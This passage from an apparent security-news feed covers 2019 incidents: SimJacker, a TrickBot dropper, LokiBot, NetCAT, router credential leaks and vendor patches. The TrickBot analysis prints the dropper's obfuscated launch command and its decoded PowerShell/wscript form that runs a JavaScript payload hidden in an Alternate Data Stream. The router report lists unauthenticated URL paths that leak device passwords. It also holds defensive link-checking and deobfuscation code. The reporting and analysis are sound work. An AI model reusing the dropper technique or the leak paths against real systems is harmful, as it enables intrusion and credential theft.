“It’s a major wake-up call that shows hostile actors are investing heavily in increasingly complex and creative ways to undermine network security. This compromises the security and trust of customers, mobile operators, and impacts the national security of entire countries.”

Security experts believe that the public disclosure of the SimJacker attack could allow threat actors to use it in their operations, and there is a concrete risk that they could also evolve this technique.

The experts reported their discovery to the GSM Association and the SIMalliance; the latter published a list of recommendations for SIM card manufacturers. The SIMalliance recommends implementing security for S@T push messages.

Mobile operators can also mitigate the attack by analyzing and blocking suspicious messages that contain S@T Browser commands.


Pierluigi Paganini

(SecurityAffairs – SimJacker, hacking)

The post SimJacker attack allows hacking any phone with just an SMS appeared first on Security Affairs.

[Category: Breaking News, Hacking, Mobile, hacking news, information security news, Pierluigi Paganini, Security Affairs, Security News, simjacker, spyware]

Posted 9/12/19 8:12am
SAP released the September 2019 Security Patch that addressed four Security Notes rated as Hot News by the company.

SAP released the September 2019 Security Patch that addressed four Security Notes rated as Hot News by the company, but only one of them is new.

SAP released 16 new or updated Security Notes; the overall number of Security Notes published this month is lower than in August.

The new Security Note addresses a code injection vulnerability in SAP NetWeaver AS for Java (Web Container). The issue, tracked as CVE-2019-0355, received a CVSS score of 9.1.

The vulnerability affects the SAP default implementation of the HTTP PUT method; an attacker could exploit the flaw to bypass the input validation check.

“SAP NetWeaver Application Server Java Web Container, ENGINEAPI (before versions 7.10, 7.20, 7.30, 7.31, 7.40, 7.50) and SAP-JEECOR (before versions 6.40, 7.0, 7.01), allows an attacker to inject code that can be executed by the application. An attacker could thereby control the behaviour of the application,” reads the security advisory.

An attacker could upload dynamic web content and take over the application; possible impacts are the unauthorized execution of commands, the disclosure of sensitive information, and a Denial of Service condition.

Two other Hot News notes update patches released in the past; they address an OS command injection vulnerability in SAP Diagnostics Agent (CVE-2019-0330).

“A SolMan admin can abuse the Diagnostic Agent (SMDAgent) bug and gain access to any SAP system connected to the SolMan system,” reads the analysis published by security firm Onapsis. “Even though many SolMan admins have admin privileges in other SAP systems, certain scenarios may allow an escalation of privileges to those who don’t.”

The last Hot News note released in the September 2019 Security Patch updates a patch released in April 2018 and addresses security issues that affect the Google Chromium browser control delivered with SAP Business Client.

SAP also released a set of security patches after the second Tuesday of last month and before the second Tuesday of this month.

The full list of Security Notes released by SAP is available here:


Pierluigi Paganini

(SecurityAffairs – September 2019 Security Patch, security)

The post SAP September 2019 Security Patch Day addresses four Security Notes rated as Hot News appeared first on Security Affairs.

[Category: Breaking News, Security, Hacking, hacking news, information security news, Pierluigi Paganini, SAP September 2019 Security Patch Day, Security Affairs, Security News]

Posted 9/12/19 3:27am
Iran-linked Cobalt Dickens APT group carried out a spear-phishing campaign aimed at tens of universities worldwide.

Researchers at Secureworks’ Counter Threat Unit (CTU) uncovered a phishing campaign carried out by the Iran-linked Cobalt Dickens APT group (also known as Silent Librarian) that targeted more than 60 universities on four continents in July and August.

According to the experts, the attacks are part of a large campaign that has hit at least 380 universities in more than 30 countries; in many cases the organizations have been hit multiple times.

“In July and August 2019, CTU researchers discovered a new large global phishing operation launched by COBALT DICKENS. This operation is similar to the threat group’s August 2018 campaign, using compromised university resources to send library-themed phishing emails,” reads the analysis published by Secureworks. “The messages contain links to spoofed login pages for resources associated with the targeted universities. Unlike previous campaigns that contained shortened links to obscure the attackers’ infrastructure, these messages contain the spoofed URL.”

The universities hit by the hackers are in Australia, Canada, Hong Kong, the U.S., the U.K., and Switzerland. The experts have noticed that the APT group is using free online services as part of its operations, including certificates issued by the Let’s Encrypt CA, free domains, and publicly available tools.

The hackers registered at least 20 new domain names through the Freenom domain provider that offers free top-level domain names.

The hackers appear to be interested in getting access to the library: they sent phishing messages to people with access to the library of the targeted university. As usual, the messages urge the victims to take specific actions; in this case, the attackers invite the victim to reactivate the account by following a spoofed link.

Unlike previous campaigns attributed to this APT group, this time the hackers used a spoofed link instead of relying on shortened URLs pointing to the fake login page.

The landing page appears to be identical or quite similar to the spoofed library resource.

Once the victims have provided their credentials, they are stored in a file named ‘pass.txt’ and the users are redirected to the genuine university website to avoid raising suspicion.
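The spoofed-link pattern described above (a lookalike host for the university's library resource, often under a free Freenom TLD, instead of a shortened URL) lends itself to a simple mail-filter check. The following is an added example, not Secureworks' or the report's code; the list of free Freenom TLDs is an assumption based on Freenom's public offering, and the legitimate hosts and sample URLs are constructed for illustration.

```javascript
// Free TLDs handed out by Freenom (assumption, not from the report).
const FREE_TLDS = new Set(["tk", "ml", "ga", "cf", "gq"]);

// Hostname of a URL, lower-cased, or null if the URL does not parse.
function hostOf(url) {
  try {
    return new URL(url).hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

// Labels of a hostname that carry its "brand": everything but the TLD and "www".
function brandLabels(host) {
  return host.split(".").filter(Boolean).slice(0, -1).filter((l) => l !== "www");
}

// Classify a link found in a library-themed e-mail against the university's real hosts.
// Returns { verdict: "ok" | "suspicious" | "unknown" | "invalid", reasons: [...] }.
function assessLibraryLink(url, legitimateHosts) {
  const host = hostOf(url);
  if (host === null) return { verdict: "invalid", reasons: ["unparseable URL"] };

  const legit = legitimateHosts.map((h) => h.toLowerCase());
  // Exact host or a subdomain of it belongs to the university.
  if (legit.some((real) => host === real || host.endsWith("." + real))) {
    return { verdict: "ok", reasons: [] };
  }

  const reasons = [];
  const tld = host.split(".").pop();
  if (FREE_TLDS.has(tld)) reasons.push(`free Freenom TLD .${tld}`);

  // Lookalike hosts reuse the real host's labels joined by '-' or '.',
  // e.g. library.univ.edu -> library-univ-edu.tk or univ.edu.library-login.ga
  const tokens = host.split(/[-.]/);
  for (const real of legit) {
    const hits = brandLabels(real).filter((l) => l.length > 3 && tokens.includes(l));
    if (hits.length) reasons.push(`reuses labels "${hits.join('", "')}" of ${real}`);
    if (host.includes(real)) reasons.push(`embeds ${real} without being that host`);
  }
  return { verdict: reasons.length ? "suspicious" : "unknown", reasons };
}

// Constructed sample: the university's real library and SSO hosts ...
const LEGIT_HOSTS = ["library.univ.edu", "login.univ.edu"];
// ... and four links as they might appear in incoming mail.
const SAMPLE_LINKS = [
  "https://library.univ.edu/account/reactivate",
  "https://library-univ-edu.tk/login",
  "https://univ.edu.library-login.ga/reactivate",
  "https://www.example.org/news",
];

function assessSamples() {
  return SAMPLE_LINKS.map((u) => ({ url: u, ...assessLibraryLink(u, LEGIT_HOSTS) }));
}

for (const r of assessSamples()) {
  console.log(`${r.verdict.padEnd(10)} ${r.url}  ${r.reasons.join("; ")}`);
}
```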

“Metadata in other spoofed web pages supports the assessment that the threat actors are of Iranian origin. Specifically, a page copied on August 3 reveals an Iranian-related timestamp.” continues the report.

In August 2018, researchers at SecureWorks discovered another large phishing campaign targeting universities that was carried out by COBALT DICKENS.

Iranian hacking activity has intensified in recent years; security firms have uncovered the operations of many Iran-linked APT groups.

In March 2018, the US Department of Justice and Department of the Treasury announced charges against nine Iranians for alleged involvement in a massive state-sponsored hacking scheme; at the time, the hackers had hit more than 300 universities and tens of companies in the US and abroad and stolen “valuable intellectual property and data.”

According to the Treasury Department, since 2013, the Mabna Institute hit 144 US universities and 176 universities in 21 foreign countries.

Geoffrey Berman, US Attorney for the Southern District of New York, revealed that the spear phishing campaign targeted more than 100,000 university professors worldwide and that about 8,000 accounts were compromised.

The Iranian hackers exfiltrated 31 terabytes of data; roughly 15 billion pages of academic projects were stolen.

The hackers also targeted the US Department of Labor, the US Federal Energy Regulatory Commission, and many private and non-governmental organizations.

The sanctions also hit the Mabna Institute, an Iran-based company that had a critical role in coordinating the attacks on behalf of Iran’s Revolutionary Guards.


Pierluigi Paganini

(SecurityAffairs – Cobalt Dickens, Iran APT)

The post Iran-linked group Cobalt Dickens hit over 60 universities worldwide appeared first on Security Affairs.

[Category: APT, Cyber warfare, Hacking, colbalt dickens, Cyberespionage, information security news, Iran, Pierluigi Paganini, Security Affairs, Security News]

Posted 9/11/19 11:23pm
Security researchers at Fortinet uncovered a malspam campaign aimed at distributing the LokiBot malware to a US manufacturing company.

FortiGuard SE Team experts uncovered a malspam campaign aimed at distributing the LokiBot malware to a US manufacturing company.

The LokiBot malware has been active since 2015; it is an infostealer that was involved in many malspam campaigns aimed at harvesting credentials from web browsers, email clients and admin tools, and that was also used to target cryptocoin-wallet owners.

The original LokiBot malware was developed and sold online by a hacker who goes by the alias “lokistov” (aka Carter).

The malicious code was initially advertised on many hacking forums for up to $300, later other threat actors started offering it for less than $80 in the cybercrime underground.

Now researchers spotted phishing messages targeting the employees of a large U.S. manufacturing company.

The LokiBot variant involved in the attack was detected on August 21 and, according to the researchers, it was compiled the same day.

“The FortiGuard Labs SE team identified a new malicious spam campaign on August 21st, which we discovered after an analysis of information initially found on VirusTotal,” reads the analysis of the experts. “It targeted a large US manufacturing company utilizing the well documented infostealer LokiBot. Interestingly enough, this also has a compilation date of August 21st, which is the same day we discovered the malspam campaign.”

The phishing messages targeted the sales email address of the recipients; the emails were possibly sent from a compromised trusted sender with the IP address 23[.]83[.]133[.]8.

The messages were not written by native English speakers; they include attachments with names that attempt to trick victims into opening them with urgency (“Please see ‘attache’”, which appears to be an “RFQ”, or “request for quotation”).

The content of the spam messages encourages the victim to open the attachment because the sender’s colleague is currently out of office.

Once the victims have opened the compressed archive in the attachment, they will get infected with the LokiBot information stealer.

“LokiBot steals a variety of credentials – primarily FTP credentials, stored email passwords, passwords stored in the browser, as well as a whole host of other credentials,” continue the researchers. “We will only highlight the unique characteristics observed in this specific sample.”

The sample involved in the spear-phishing campaign is disguised as a Dora The Explorer game executable.

The IP address used to deliver the phishing emails was observed by the experts in other similar attacks in the past, one of them targeting a German bakery with spam emails in Chinese on June 17.

“This particular IP address appears to have been used twice before in malicious spam attacks that occurred several months earlier, in June, attacking a large German Bakery in a malicious spam attack trying to lure a victim into downloading an electronic invoice,” state the researchers.

“Although the German Bakery attack email was in Chinese, as was the attachment – which was an RTF file which referenced a potentially compromised URL (deepaklab[.]com), that likely contained the malicious payload – the URL has been cleaned up and no longer serves up any content that we can analyze. It can be assumed that this may be another delivery mechanism for LokiBot, as it has been documented in the past utilizing RTF distribution vectors.”

Experts pointed out that, given the low volume of spam messages delivered using this newly identified relay, the server associated with this IP address is used by one group that leverages it in very targeted attacks.

Unlike previous LokiBot variants, this particular sample did not use any steganography.

More details, including indicators of compromise (IOCs), are reported in the analysis published by Fortinet.


Pierluigi Paganini

(SecurityAffairs – LokiBot, hacking)

The post LokiBot info stealer involved in a targeted attack on a US Company appeared first on Security Affairs.

[Category: Breaking News, Cyber Crime, Malware, hacking news, information security news, LokiBot, malware, phishing, Pierluigi Paganini, Security Affairs, Security News]

Posted 9/11/19 4:02pm
Experts discovered a flaw dubbed NetCAT (Network Cache ATtack) that affects all Intel server-grade processors and allows attackers to sniff sensitive data over the network.

Researchers from the VUSec group at Vrije Universiteit Amsterdam have discovered a new vulnerability that can be exploited by a remote attacker to sniff sensitive details by mounting a side-channel attack over the network.

The weakness, tracked as CVE-2019-11184, resides in a performance optimization feature called Intel DDIO (Data-Direct I/O), which was implemented to grant network devices and other peripherals access to the CPU cache.

“With NetCAT, we show this threat extends to untrusted clients over the network, which can now leak sensitive data such as keystrokes in an SSH session from remote servers with no local access,” reads the analysis published by the researchers. “The root cause of the vulnerability is a recent Intel feature called DDIO, which grants network devices and other peripherals access to the CPU cache.”

An attacker controlling a machine on the target network can exploit the flaw to infer confidential data from an SSH session.

NetCAT

The experts explained that by applying a machine learning algorithm to the timing information it is possible to perform a keystroke timing analysis and discover the words typed by a victim.

“In an interactive SSH session, every time you press a key, network packets are being directly transmitted. As a result, every time you type a character inside an encrypted SSH session on your console, NetCAT can leak the timing of the event by leaking the arrival time of the corresponding network packet,” continue the experts.

“Now, humans have distinct typing patterns. For example, typing ‘s’ right after ‘a’ is faster than typing ‘g’ after ‘s.’ As a result, NetCAT can operate statistical analysis of the inter-arrival timings of packets in what is known as a keystroke timing attack to leak what you type in your private SSH session.”

The researchers found that, compared to a native local attacker, the NetCAT attack conducted by a remote attacker reduces the accuracy of the recovered keystrokes on average by only 11.7%, detecting the inter-arrival of SSH packets with a true positive rate of 85%.

The following demo video published by the researchers shows how SSH sessions can be spied on in real time by leveraging a shared server.

Intel recommends that users either disable DDIO or at least RDMA to make this attack harder to carry out. The chip vendor also suggested limiting direct access to servers from untrusted networks.

Intel classified NetCAT as a partial information disclosure issue of “low” severity (CVSS base score of 2.6). Intel rewarded the VUSec experts for the responsible disclosure.

Technical details of the research are reported in a paper published by the experts and titled “NetCAT: Practical Cache Attacks from the Network.”


Pierluigi Paganini

(SecurityAffairs – NetCAT, hacking)

The post NetCAT attack allows hackers to steal sensitive data from Intel CPUs appeared first on Security Affairs.

[Category: Breaking News, Hacking, hacker news, information security news, Intel, NetCAT attack, Pierluigi Paganini, Security Affairs, Security News]

Posted 9/11/19 7:44am
Another ransomware attack has hit a school district; the victim is an institute in Connecticut that was targeted twice in only four months.

For the second time in just four months, the Wolcott school district in Connecticut was the victim of a ransomware attack. Teachers and students were not able to access the district’s internal email system following the infection.

“Students and teachers went back to school without access to computers or the district’s internal email system again Monday, five days after a second malware attack targeted the district’s servers.” states the Republican American. “Superintendent Anthony Gasper said teachers are being “flexible” and continue to teach their classes without computer access.”

The ransomware attack took place on Sept. 4, when a staff member reported suspicious activity on a district computer. The ransomware infected computers connected to the Wolcott school district networks; IT staff shut them down in response to the incident.

A previous ransomware attack took place at the end of August and blocked operations at all five Wolcott schools.

“The district was the victim of a three-month ransomware attack this summer that blocked all five Wolcott schools from accessing internal files, as well as staff in the central office and business office,” reported the Associated Press.

According to superintendent Anthony Gasper, all the computers are still turned off, except for a few that were set up for school secretaries.

The district has hired the cyber security firm Kivu to help it with incident response and recovery operations. Unfortunately, school districts are a privileged target for crooks; other ransomware attacks have made the headlines recently.

Earlier in August, for the second time in a few days, Houston County Schools in Alabama delayed the opening of the school year due to a malware attack.

In the same period, several schools in Louisiana were also targeted by hackers ahead of the start of the school year. The AP reported that a fourth Louisiana school district, Tangipahoa Parish, is assessing the damage caused by a cyberattack that hit its computer network.


Pierluigi Paganini

(SecurityAffairs – ransomware attack, Wolcott)

The post The Wolcott school district suffered a second ransomware attack in 4 months appeared first on Security Affairs.

[Category: Breaking News, Cyber Crime, Malware, Cybercrime, hacker newa, hacker news, malware, Pierluigi Paganini, Security News, Wolcott schools]

Posted 9/11/19 7:01am
Malware researchers at Yoroi-Cybaze analyzed the TrickBot dropper, a threat that has infected victims since 2016.

Introduction

TrickBot is one of the best known Banking Trojans; it has been infecting victims since 2016 and is considered a cyber-crime tool. But nowadays defining it a “Banking Trojan” is quite reductive: over the last years its modularity has brought the malware to a higher level. In fact, it can be considered a sort of malicious implant able not only to commit bank-related crimes, but also to provide tools and mechanisms for advanced attackers to penetrate company networks. For instance, it has been used by several gangs to inoculate the Ryuk ransomware within core server infrastructure, leading to severe outages and business interruption (e.g. the Bonfiglioli case).

In this report, we analyzed one of the recently weaponized Word documents spread by TrickBot operators all around the globe, revealing an interesting dropper composed of several thousand highly obfuscated lines of code and abusing the so-called ADS (Alternate Data Stream).

Technical Analysis

Hash: 07ba828eb42cfd83ea3667a5eac8f04b6d88c66e6473bcf1dba3c8bb13ad17d6
Threat: Dropper
Brief Description: TrickBot document dropper
Ssdeep: 1536:KakJo2opCGqSW6zY2HRH2bUoHH4OcAPHy7ls4Zk+Q7PhLQOmB:3oo2hNx2Z2b9nJcAa7lsmg5LQOmB

Table 1. Sample’s information

Once opened, the analyzed Word document reveals its nature through an initial, trivial trick. The attacker simply used a white font to hide the malicious content from the unaware user (and from the endpoint agents). Just changing the font foreground color unveils some dense JavaScript code. This code will be executed in the next stages of the infection chain, but before digging into the JavaScript code, we’ll explore the macro code embedded in the malicious document.

Figure 1. Content of Word document

Figure 2. Unveiled content of Word document

The “Document_Open()” function (Figure 3) is automatically executed when the Word document is opened. It retrieves the hidden document content through the “Print #StarOk, ActiveDocument.Content.Text” statement and writes a copy of it into the “%AppData%\Microsoft\Word\STARTUP\stati_stic.inf:com1” local file.

Figure 3. Macro code embedded in the malicious document

Exploring the folder “\Word\STARTUP” we noticed that the “stati_stic.inf” file counts zero bytes. Actually, the dropper abused an old Windows file system feature, known as “Alternate Data Stream” (ADS), to hide its functional data in an unconventional stream. This known technique, T1096 in the MITRE ATT&CK framework, can be used simply by concatenating the colon operator and the stream name to the filename during any write or read operation. So, we extracted the content of the stream through a simple PowerShell command.

Figure 4. Use of Alternate Data Stream to hide the payload

The extracted payload is the initial Word document’s hidden content. The malicious control flow resumes with the “Document_Close()” function, in which the “StripAllHidden()” function is invoked. This routine deletes all the hidden information embedded in the document by the attacker, probably with the intent to hide any traces unintentionally embedded during the development phase. Its code has probably been borrowed from some public snippet such as the one included at the link

After that, the macro code executes the data just written into the “com1” data stream. Since the stream contains JavaScript code, it is executed through the WScript utility using the following instruction:

    CallByName CreateObject("wS" & Chri & "Ript.She" & Ja), "Run", VbMethod, Right(Right("WhiteGunPower", 8), Rule) & "sHe" & Ja & " wS" & Chri & "RipT" & GroundOn, 0

Which, after a little cleanup, becomes:

    CallByName CreateObject("wScript.Shell"), "Run", VbMethod, "powershell wscript /e:jscript ""c:\users\admin\appdata\roaming\microsoft\word\startup\stati_stic.inf:com1""", 0

The JavaScript Dropper

Now, let’s take a look at the JavaScript code. It is heavily obfuscated and uses randomization techniques to rename variables and some comments, along with chunks of junk instructions, resulting in a potentially low detection rate.

Figure 5. Example of the sample detection rate

At first glance, the attacker’s purpose seems fulfilled. The script is not easily readable and appears extremely complex: almost 10 thousand lines of code and over 1800 anonymous functions declared in the code.

Figure 6. Content of the JavaScript file

But after a deeper look, two key functions, named “jnabron00” and “jnabron”, emerge. These functions are used to obfuscate every comprehensible character of the script. The first one, “jnabron00”, is illustrated in the following figure: it always returns the value zero.

Figure 7. Function used to obfuscate the code

The other one, “jnabron”, is invoked with two parameters: an integer value (derived from some obfuscated operations) and a string which is always “Ch”.

    jnabron(102, 'Ch')

The purpose of this function is now easy to understand: it returns the ASCII character associated with the integer value through the “String.fromCharCode” JS function. Obviously, once again, to obfuscate the function internals the attacker included many junk instructions, as reported in Figure 9.

Figure 8. Another function used to obfuscate the code

Using a combination of the two functions, the script unpacks its real instructions, causing tedious work for the analyst who has to understand the malicious intent of the script. As shown in the following figure, tens of code lines result in a single instruction containing the real value that will be included in the final script.

Figure 9. Example of de-obfuscation process

After a de-obfuscation phase, some useful values become visible, such as the C2 address, the execution of a POST request, and the presence of Base64-encoded data.
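As an added illustration of that unpacking step (example code written here, not the Yoroi tooling or the dropper's own code), the following Python rewriter applies the two rules described above to a constructed snippet: jnabron00() calls become 0, integer arithmetic is folded, jnabron(N, 'Ch') becomes the character with code N, and adjacent single-quoted literals are concatenated. Only the helper names jnabron/jnabron00 come from the analysis; the sample lines are constructed.

```python
import re

# Constructed sample in the style of the two helpers described above
# (jnabron(n, 'Ch') -> chr(n), jnabron00() -> 0); not the dropper's own code.
SAMPLE = (
    "var m = jnabron(80, 'Ch') + jnabron(79, 'Ch') + jnabron(83, 'Ch') + jnabron(84, 'Ch');\n"
    "var z = jnabron00() + jnabron00();\n"
    "var h = jnabron((100 + 4) + jnabron00(), 'Ch') + 'ttp';\n"
)

# Regex-based rewriting (no full JS parse): good enough for the helper idioms,
# but it will also fold digits that happen to sit inside string literals.
ZERO_CALL = re.compile(r"jnabron00\(\s*\)")
CHAR_CALL = re.compile(r"jnabron\(\s*(\d+)\s*,\s*['\"]Ch['\"]\s*\)")
INT_ARITH = re.compile(r"\b(\d+)\s*([+-])\s*(\d+)\b")
# "(104)" -> "104", but not "bar(5)" (the lookbehind keeps call sites intact)
PAREN_INT = re.compile(r"(?<![\w)])\(\s*(\d+)\s*\)")
STR_CONCAT = re.compile(r"'((?:[^'\\]|\\.)*)'\s*\+\s*'((?:[^'\\]|\\.)*)'")


def js_escape(ch: str) -> str:
    """Escape one character so it is safe inside a single-quoted JS literal."""
    if ch in ("'", "\\"):
        return "\\" + ch
    if ord(ch) < 0x20 or ord(ch) > 0x7E:
        return "\\u%04x" % ord(ch)
    return ch


def _fold_arith(m: re.Match) -> str:
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    return str(a + b if op == "+" else a - b)


def deobfuscate_pass(src: str) -> str:
    """One rewrite pass: fold the helpers and the simple expressions around them."""
    src = ZERO_CALL.sub("0", src)
    src = INT_ARITH.sub(_fold_arith, src)
    src = PAREN_INT.sub(lambda m: m.group(1), src)
    # String.fromCharCode keeps the low 16 bits of its argument, so mask like JS does
    src = CHAR_CALL.sub(lambda m: "'" + js_escape(chr(int(m.group(1)) & 0xFFFF)) + "'", src)
    src = STR_CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", src)
    return src


def deobfuscate(src: str, max_passes: int = 20) -> str:
    """Repeat passes until a fixpoint: each pass can expose new foldable expressions."""
    for _ in range(max_passes):
        new = deobfuscate_pass(src)
        if new == src:
            break
        src = new
    return src


def extract_strings(src: str) -> list:
    """Collect the recovered single-quoted literals (URLs, verbs, encoded blobs)."""
    return re.findall(r"'((?:[^'\\]|\\.)*)'", src)


if __name__ == "__main__":
    cleaned = deobfuscate(SAMPLE)
    print(cleaned)
    print("recovered literals:", extract_strings(cleaned))
```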

Figure 10. C2 checkin code

Analyzing this hidden control flow, we discover that the first action to be performed is the gathering of particular system information. This is done through the WMI interface, specifying a particular WQL query and invoking the "ExecQuery" function to retrieve:

  • Info about Operating System
  • Info about machine
  • Info about current user
  • List of all active processes

Figure 11. Code used to extract information about system

This information is then sent to the command and control server during the check-in phase of the JavaScript loader, along with the list of running processes.

Figure 12. Network traffic

Moreover, the script is able to gather a list of all files that have one of the extensions chosen by the attacker: PDF files, Office, Word and Excel documents. The result of this search is then written to a local file in the "%TEMP%" folder, and later uploaded to the attacker's infrastructure.

Figure 13. Code to extract absolute paths from specific file types

Conclusion

TrickBot is one of the most active banking Trojans today; it is considered part of the cybercrime arsenal and is still under development. The malware, which first appeared in 2016, has added functionalities and exploit capabilities over the last years, such as the infamous SMB vulnerability (MS17-010), including EternalBlue, EternalRomance or EternalChampion.

The analyzed dropper contains highly obfuscated JavaScript code of about 10 thousand lines. This new infection chain structure represents an increased threat to companies and users: it can achieve low detection rates, enabling the unnoticed delivery of the TrickBot payload, which can be really dangerous for its victims. Just a few days, or even a few hours in some cases, of active infection could be enough to propagate advanced ransomware attacks across the company's entire IT infrastructure.

Technical details, including IoCs and Yara rules, are available in the analysis published on the Yoroi blog.

https://blog.yoroi.company/research/dissecting-the-10k-lines-of-the-new-trickbot-dropper/


Pierluigi Paganini

(SecurityAffairs – Trickbot, malware)

The post Dissecting the 10k Lines of the new TrickBot Dropper appeared first on Security Affairs.

[Category: Breaking News, Malware, information security news, Pierluigi Paganini, Security Affairs, Security News, TrickBot]

[l] at 9/11/19 1:01am
Security experts have discovered that some models of D-Link and Comba WiFi routers leak their administrative login credentials in plaintext.

Security researchers from Trustwave’s SpiderLabs have discovered several credential leaking vulnerabilities in some models of D-Link and Comba Telecom.

The researcher Simon Kenin from SpiderLabs discovered five credential leaking vulnerabilities: three of them affect some Comba Telecom WiFi routers, while the remaining two impact a D-Link DSL modem.

An attacker could use these credentials to take over the routers and perform several malicious activities by changing device settings (e.g. changing DNS settings to hijack traffic or perform MitM attacks).

“There are five new credential leaking vulnerabilities discovered and disclosed by Simon Kenin. Two are in a D-Link DSL modem typically installed to connect a home network to an ISP.” reads the security advisory. “The other three are in multiple Comba Telecom WiFi devices. All the vulnerabilities involve insecure storage of credentials including three where cleartext credentials are available to any user with network access to the device.”

In previous research, Kenin discovered similar flaws (CVE-2017-5521) in tens of models of Netgear routers, potentially affecting over one million Netgear customers.

While analyzing the dual-band D-Link DSL-2875AL wireless router, the expert discovered that a file located at https://[router ip address]/romfile.cfg contains the login password of the device in plaintext. Anyone with access to the web-based management IP address can read the file without any authentication. The expert confirmed that at least versions 1.00.01 & 1.00.05 are affected, and likely other models.

D-Link DSL-2875AL wireless router

The second flaw affects the D-Link DSL-2875AL and DSL-2877AL models. Analyzing the source code of the router login page (https://[router ip address]/index.asp), Kenin noticed the following lines:

var username_v = '<%TCWebApi_get("Wan_PVC","USERNAME","s")%>';
var password_v = '<%TCWebApi_get("Wan_PVC","PASSWORD","s")%>';

The devices are leaking the credentials for authenticating with the Internet Service Provider (ISP).

“The username & password listed there are used by the user to connect to his/her ISP. This could allow an attacker to access the ISP account or the router itself if the admins reused the same credentials.” continues the advisory.

Kenin reported the flaw to the vendor in early July, but D-Link released the fix on September 6.

The first of the three flaws affecting the Comba Wi-Fi Access Controllers impacts the Comba AC2400. The device leaks the MD5 hash of the device password by accessing the following URL without requiring any authentication.

https://[router ip address]/09/business/upgrade/upcfgAction.php?download=true

Unsalted MD5 hashes are known to be very easy to crack, and the expert pointed out that if SSH/Telnet is enabled an attacker could take over the device.

The remaining two issues impact the Comba AP2600-I WiFi Access Point (version A02,0202N00PD2).

One of them causes the leak of the MD5 hash of the device username and password through the source code of the web-based management login page; the second one leaks credentials in plaintext stored in an SQLite database file located at:

https://[router ip address]/goform/downloadConfigFile

The expert had been attempting to report the flaws to the vendor since February, but without success. The three flaws are unpatched at the time of writing.

“These types of router vulnerabilities are very serious. Since your router is the gateway in and out of your entire network it can potentially affect every user and system on that network. An attacker-controlled router can manipulate how your users resolve DNS hostnames to direct your users to malicious websites.” concludes the advisory. “An attacker-controlled router can deny access in and out of the network perhaps blocking your users from accessing important resources or blocking customers from accessing your website.”


Pierluigi Paganini

(SecurityAffairs – D-Link, hacking)

The post Some models of Comba and D-Link WiFi routers leak admin credentials appeared first on Security Affairs.

[Category: Breaking News, Hacking, Internet of Things, D-Link router, hacking news, information security news, Pierluigi Paganini, Security Affairs, Security News]

[l] at 9/11/19 12:29am
Adobe September 2019 Patch Tuesday updates address two code execution bugs in Flash Player and a DLL hijacking flaw in Application Manager.

Adobe has released September 2019 Patch Tuesday updates that address two code execution vulnerabilities in Flash Player and a DLL hijacking flaw in Application Manager.

The two flaws addressed with the Flash Player 32.0.0.255 release are a use-after-free issue tracked as CVE-2019-8070, and a same-origin method execution flaw tracked as CVE-2019-8069. Adobe states that the flaws could be exploited by attackers for arbitrary code execution in the context of the targeted user.

“Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address critical vulnerabilities in Adobe Flash Player. Successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

Both issues are rated as “critical”, but Adobe believes that their exploitation is hard and for this reason assigned them a priority rating of 2 (and 3 on Linux systems).

Adobe credited the expert Eduardo Braun Prado and a researcher who decided to remain anonymous for reporting the vulnerabilities.

Adobe also fixed a DLL hijacking vulnerability in the installer of the Application Manager that could be exploited to execute arbitrary code on the affected system. The vulnerability, tracked as CVE-2019-8076, was classified as “important” and received a priority rating of 3.

“Adobe has released a security update for the Adobe Application Manager installer for Windows. This update resolves an insecure library loading vulnerability in the installer that could lead to Arbitrary Code Execution.” reads the security advisory published by Adobe.

The flaw was reported by the security researcher Hamdi Maamri.

“This vulnerability exclusively impacts the installer used with the Adobe Application Manager. CVE-2019-8076 does not impact the existing Application Manager, and there is no action for customers running earlier versions,” continues the security advisory.


Pierluigi Paganini

(SecurityAffairs – Patch Tuesday, hacking)

The post Adobe September 2019 Patch Tuesday updates fix 2 code execution flaws in Flash Player appeared first on Security Affairs.

[Category: Breaking News, Security, Adobe September 2019 Patch Tuesday, hacking news, information security news, Pierluigi Paganini, Security Affairs, Security News]

[l] at 9/11/19 12:05am
Microsoft Patch Tuesday updates for September 2019 address 80 flaws, including two privilege escalation issues exploited in attacks.

Microsoft Patch Tuesday security updates for September 2019 address 80 vulnerabilities, including two privilege escalation flaws that have been exploited in attacks in the wild.

The updates cover Microsoft Windows, Internet Explorer, Microsoft Edge, ChakraCore, Office and Microsoft Office Services and Web Apps, Skype for Business and Microsoft Lync, Visual Studio, .NET Framework, Exchange Server, Microsoft Yammer, and Team Foundation Server.

17 flaws are classified as Critical, 62 are listed as Important, and one is listed as Moderate in severity.

The first zero-day issue, tracked as CVE-2019-1214, resides in the Windows Common Log File System (CLFS) and could be exploited by an authenticated attacker with regular user privileges to escalate permissions to administrator.

The vulnerability affects all supported versions of Windows.

“An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context.” reads the security advisory published by Microsoft.

“To exploit the vulnerability, an attacker would first have to log on to the system, and then run a specially crafted application to take control over the affected system.”

Microsoft addresses the vulnerability by correcting how CLFS handles objects in memory.

“According to Microsoft, this CVE is only being seen targeting older operating systems. This is a fine time to remind you that Windows 7 is less than six months from end of support, which means you won’t be getting updates for bugs like this one next February.” states a post published by ZDI.

The flaw was reported by a researcher from the Qihoo 360 Vulcan Team.

The second zero-day vulnerability tracked as CVE-2019-1215 affects Winsock (ws2ifsl.sys) and could be exploited by a local authenticated attacker to execute code with elevated privileges.

“An elevation of privilege vulnerability exists in the way that ws2ifsl.sys (Winsock) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated privileges.” reads the advisory.

“To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.”

Microsoft addressed the vulnerability by ensuring that ws2ifsl.sys properly handles objects in memory.

Microsoft confirmed that this flaw has already been exploited by malware since 2017.

“Microsoft reports this is being actively used against both newer and older supported OSes, but they don’t indicate where. Interestingly, this file has been targeted by malware in the past, with some references going back as far as 2007.” reads the analysis published by the Zero Day Initiative. “Not surprising, since malware often targets low-level Windows services. Regardless, since this is being actively used, put this one on the top of your patch list.”

Microsoft also addressed two vulnerabilities that were publicly disclosed before fixes were made available, CVE-2019-1235 and CVE-2019-1294.

The first is a privilege escalation issue in the Windows Text Service Framework; the second is a Windows Secure Boot bypass.


Pierluigi Paganini

